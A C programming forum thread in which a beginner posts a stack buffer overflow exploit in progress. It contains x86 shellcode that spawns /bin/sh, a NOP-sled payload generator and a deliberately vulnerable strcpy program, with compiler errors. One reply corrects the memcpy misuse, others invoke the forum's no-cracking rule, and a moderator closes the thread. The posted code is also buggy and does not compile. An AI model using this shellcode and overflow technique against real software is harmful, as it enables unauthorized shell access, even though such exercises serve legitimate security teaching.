Buffer Overflow HELP ! - Errors !

This is a discussion on Buffer Overflow HELP ! - Errors ! within the C Programming forums, part of the General Programming Boards category; I am new to buffer overflow; I'm trying to overflow a 517 byte buffer. Using gdb to debug the program, ...

  1. #1
    Registered User
    Join Date
    Oct 2012
    Posts
    2

    Buffer Overflow HELP ! - Errors !

    I am new to buffer overflow; I'm trying to overflow a 517 byte buffer. Using gdb to debug the program, I know that it takes 533 bytes to overflow the ebp and 537 to overflow the eip. I am attempting to fill the buffer with NOPs and shellcode. The input is placed into a "malicious file" and a stack.c program places the information on the stack. I'm trying to overflow the buffer such that I can get the pointer to point to my shellcode in order to run it. Below are my programs, but I am getting some errors with how I am using memcpy to put the NOPs and shellcode into the buffer.

    Code:
    //VULNERABLE FILE exploit.c
    #include <stdlib.h>
    #include <stdio.h>
    #include <string.h>
    
    char shellcode[]=
        "\x31\xc0"             // xorl    %eax,%eax
        "\x50"                 // pushl   %eax                   
        "\x68""//sh"           // pushl   $0x68732f2f            
        "\x68""/bin"           // pushl   $0x6e69622f            
        "\x89\xe3"             // movl    %esp,%ebx              
        "\x50"                 // pushl   %eax                   
        "\x53"                 // pushl   %ebx                   
        "\x89\xe1"             // movl    %esp,%ecx              
        "\x99"                 // cdql                           
        "\xb0\x0b"             // movb    $0x0b,%al              
        "\xcd\x80"             // int     $0x80                  
    ;
    long get_esp(void){
            __asm__("movl %esp, %eax");//attempting to get the stack pointer address
    }
    
    void main(int argc, char **argv)
    {
        char buffer[517];
        FILE *maliciousfile;
            long addr;
            addr = get_esp();
        // Initialize buffer with 0x90 (NOP instruction)
        memset(&buffer, 0x90, 517);
    
        // filling buffer with appropriate contents here
            memcpy(&buffer, 0x90, buffer-strlen(shellcode)); //trying to add NOPs to the buffer
            memcpy(&buffer + buffer-strlen(shellcode), shellcode, strlen(shellcode));  //trying to add shellcode to the buffer
             long *ptr = (long *)(buffer+8);  /*not sure about this part either - buffer is 517 bytes, buffer+4=521 and location of EBP, buffer+8=525 is return address. I'm attempting to place the pointer and subsequently the esp address at the return address in order to read the shellcode*/
            
    *ptr = addr; //make eip point to shellcode address
    
    
        // Save the contents to the file "malicious file"
       maliciousfile = fopen("./malicious", "w");
       fwrite(buffer, 517, 1, maliciousfile);
       fclose(maliciousfile);
    }
    
    
    
    //STACK FILE
    #include<stdlib.h>
    #include<stdio.h>
    #include<string.h>
    
    int bof(char *str)
    {
            char buffer[12];
    
            //statement has a buffer overflow problem
            strcpy(buffer, str);
    
            return 1;
    }
    
    int main(int argc, char *argv)
    {
            char str[517];
            FILE *maliciousfile;
    
            badfile = fopen("maliciousfile", "r");
            fread(str, sizeof(char), 517, maliciousfile);
            bof(str);
            printf("Returned Properly\n");
            return 1;
    }
    
    ERRORS
    exploit.c: In function ‘main’:
    exploit.c:34:30: error: invalid operands to binary - (have ‘char *’ and ‘void *’)
    exploit.c:34:2: warning: passing argument 2 of ‘memcpy’ makes pointer from integer without a cast
    /usr/include/string.h:44:14: note: expected ‘const void * __restrict__’ but argument is of type ‘int’
    exploit.c:35:17: error: invalid operands to binary + (have ‘char (*)[517]’ and ‘char *’)

  2. #2
    Registered User
    Join Date
    Nov 2010
    Location
    Long Beach, CA
    Posts
    5,425
    I'm guessing you either didn't read the forum guidelines (that's a link, click it), or chose to ignore #6.

  3. #3
    Registered User
    Join Date
    Oct 2012
    Posts
    2
    It's just shellcode, not actual malicious code, that's just a name I gave it. Wouldn't really consider this hacking but if you all are that strict then I guess.... Thanks for your Help though.

  4. #4
    Registered User
    Join Date
    Nov 2010
    Location
    Long Beach, CA
    Posts
    5,425
    Quote Originally Posted by newbieSecurity View Post
    It's just shellcode, not actual malicious code, that's just a name I gave it. Wouldn't really consider this hacking but if you all are that strict then I guess....
    I don't know what else you could consider it, except for the more accurate term, "cracking". Besides, "just shellcode" can be very malicious. Getting illegal shell access (interactive or not) via a buffer overflow reeks of maliciousness. What stops you from replacing the "just shellcode" with something more malicious? And to top it off, you gave no reason why you want to do this, not that any answer would magically make what you're doing okay.
    Thanks for your Help though.
    You're welcome! I'm glad I could help you learn about the "no cracking" policy here .

  5. #5
    - - - - - - - - oogabooga's Avatar
    Join Date
    Jan 2008
    Posts
    2,808
    Two problems. In your use of memset and memcpy, you pass &buffer, but should just pass buffer.

    And this simply makes no sense:
    memcpy(buffer, 0x90, buffer-strlen(shellcode));
    The second param is the destination address. 0x90 ???
    You presumably want memset here, although since you've already memset the buffer with 0x90's I'm not sure what you're trying to do.
    The cost of software maintenance increases with the square of the programmer's creativity. - Robert D. Bliss

  6. #6
    and the hat of wrongness Salem's Avatar
    Join Date
    Aug 2001
    Location
    The edge of the known universe
    Posts
    32,417
    Closed - as per the rules.
    If you dance barefoot on the broken glass of undefined behaviour, you've got to expect the occasional cut.
    If at first you don't succeed, try writing your phone number on the exam paper.
    I support http://www.ukip.org/ as the first necessary step to a free Europe.

Popular pages Recent additions subscribe to a feed

Similar Threads

  1. Best way to prevent buffer-overflow
    By Siphon in forum C Programming
    Replies: 1
    Last Post: 01-01-2007, 10:53 AM
  2. buffer overflow
    By cpp_is_fun in forum C Programming
    Replies: 2
    Last Post: 10-24-2006, 11:04 PM
  3. Buffer overflow errors
    By EvBladeRunnervE in forum C Programming
    Replies: 2
    Last Post: 03-17-2004, 03:58 PM
  4. Buffer overflow issue.
    By caroundw5h in forum C Programming
    Replies: 3
    Last Post: 12-27-2003, 11:13 AM

Tags for this Thread


1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21